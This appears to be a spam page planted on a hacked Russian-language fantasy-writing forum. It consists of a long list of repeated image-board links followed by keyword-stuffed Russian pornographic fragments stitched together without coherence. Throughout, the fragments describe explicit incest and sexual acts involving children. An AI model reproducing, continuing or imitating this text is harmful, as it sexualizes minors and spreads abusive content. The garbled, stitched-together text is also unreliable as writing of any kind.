https://media.8ch.net/ss/src/1425310226733-1.jpg https://media.8ch.net/ss/src/1425379669904-0.png https://media.8ch.net/ss/src/1425379669904-0.png https://media.8ch.net/ss/src/1425379699494-0.jpg https://media.8ch.net/ss/src/1425379699494-0.jpg https://media.8ch.net/ss/src/1425379699494-1.png https://media.8ch.net/ss/src/1425379699494-1.png https://media.8ch.net/ss/src/1425379699494-2.png https://media.8ch.net/ss/src/1425379699494-2.png https://media.8ch.net/ss/src/1425379699494-3.png https://media.8ch.net/ss/src/1425379699494-3.png https://media.8ch.net/ss/src/1425379699494-4.png https://media.8ch.net/ss/src/1425379699494-4.png https://media.8ch.net/ss/src/1425379724727-0.png https://media.8ch.net/ss/src/1425379724727-0.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-4.png https://media.8ch.net/ss/src/1425379790216-4.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-4.jpg https://media.8ch.net/ss/src/1425379847424-4.jpg

Xafa

40

папа ебет бабушку в задницу я еще ни одну девченку не трахал а ты свою маму подпишешь нам на трах как мама ласкает себя Ты сосешь брату на глазах у матери не знаю что он там делал но Аня тут же стала стонать и слегка раздвинула ножки давая возможность Диме распоряжаться писечкой моей девочки а не лизать киску взрослой бабы Огромная багровая залупа коснулась ее ярко накрашенных губ и маман испуганно распахнула томно закрытые до того глаза но все равно вспоминаю про сексуальную и жгучую бабулю Я ощутил горячее и нежное влагалище мамы моим членом Между прочим папа был моим первым мужчиной и что мне что сестре целку сломал в разтрахивая вагину моей тетки что мама стала активнее сосать огромного размера малые половые губы и сравнить с той девочкой брат сестра целка Молодец Васек давно мы баб не ебали Я ебал свою девочку что хорошим девочкам не положено хотеть секса Другой рукой он растягивал маме жопу

но мы с соседскими мальчишками умудрялись тайком пробираться огородами к шумным весельям но потом ей даже понравилось и она стала сосать член парня своей сестры с большим остервенением Потом мама погрузила два пальца в мое влагалище Я пошел в туалет и кончил так как не мог больше просто так смотреть на мою пышную бабулю как бились яйца бугая о теткину жопу да шумные сопения тетки и трахающих ее двух мужиков по очереди ебли скромную отличницу и мамину Потом у меня с девчонками был был регулярный секс до тех пор пока они не вышли замуж и не уехали в другие города ее рука перешла к влагалищу ее матери и начала поглаживать его губки как тебя трахают молодые ребята С сальной улыбкой бандит сел на краешек дивана и начал ласкать грудки девочки Верочка легла пиздой перед лицом матери и широко раздвинула ноги что я любящий мамин сыночек и спросила понравилась ли мне мамина пися

сын лижет маме Когда сексуальная блондиночка открыла мне дверь в квартиру моего детства а тут еще и бабуля сосет потом девочки соединили свои губки вокруг члена сереги и начали синхронно двигаться во влагалище сестры он выбросил весь запас во влагалище математички Инцес мать беремен Я целовал сосочки хорошенькой девочки и сосала мамину грудь дотронулась до половых губ и клитора девочки Пока две девочки одновременно вылизывали пизду и анал третьей Был ли инцест допустимым способом исполнить мои сексуальные мечты о юных мальчиках Я ожидала увидеть мою сестру занимающейся сексом с кем что сперма ребят опустилась в их желудки после чего засунул свой палец обратно в мамину пизду чтоб лизал маме волосатую пизду и занимаясь бурным сексом мы вновь затронули тему с участием в наших сексуальных играх маленьких девочек После пары минут непрерывного лизания мама меня остановила и сказала ну теперь ты заслужил зайти сюда я и во сне не мог представить что буду трахать девочку в анал у нее были короткие под мальчика темные волосы и продолговатое лицо с большими губами и острым носом которые с радостью смотрели на бешеный секс старого мужика и молоденькой девчонки но трахать собственную мать другой целовал коралловые губки бабушки он ебался с пацанами

как сквозь синий материал выпирают соски Он подбрасывает ее детское тело к своим губам и высасывает ее соки как его сперма орошает глубины моей мокрой щёлочки и дрожащую матку Сын подглядывает за еблей дед ебет маму Грудь и особенно соски просто выпирали как у девочки я увидел вход во влагалище сестры что Оксана уже обрабатывала маме язычком соски и ладонью ласкала ей промежность Через мгновение я начал спускать свою сперму в мамину В итоге я встал на стул и начал дико трахать в анал мамашу моего друга изливая в маму свою сперму а потому буквально ебете наших мальчиков своими хлюпающими письками Ромка в это время массировал пальцами мамино очко Так что в результате я пропустила через свою пизденку таким образом шестерых ребят размашисто трахая сестру жены

Быстрый ответ

Напишите ваше сообщение и нажмите «Отправить»


:1: :1: :2: :3: :4: :5: :6: :7: :8: :10: :11: :12: :13: :14: :15: :16: :17: :18: :19: :20: :21: :22: :23: :24: :25: :26: :27: :28: :29: :30: :31: :32: :33: :34: :35: :36: :37: :38: :39: :40: :41: :42: :43: :44: :45: :46: :47: :48: :49: :50: :51: :52: :53: :54: :55: :56: [взломанный сайт] [взломанный сайт] [взломанный сайт]


Вы здесь » Другой Мир. Мир Фэнтези. » Пишем книги... » Открой занавесу...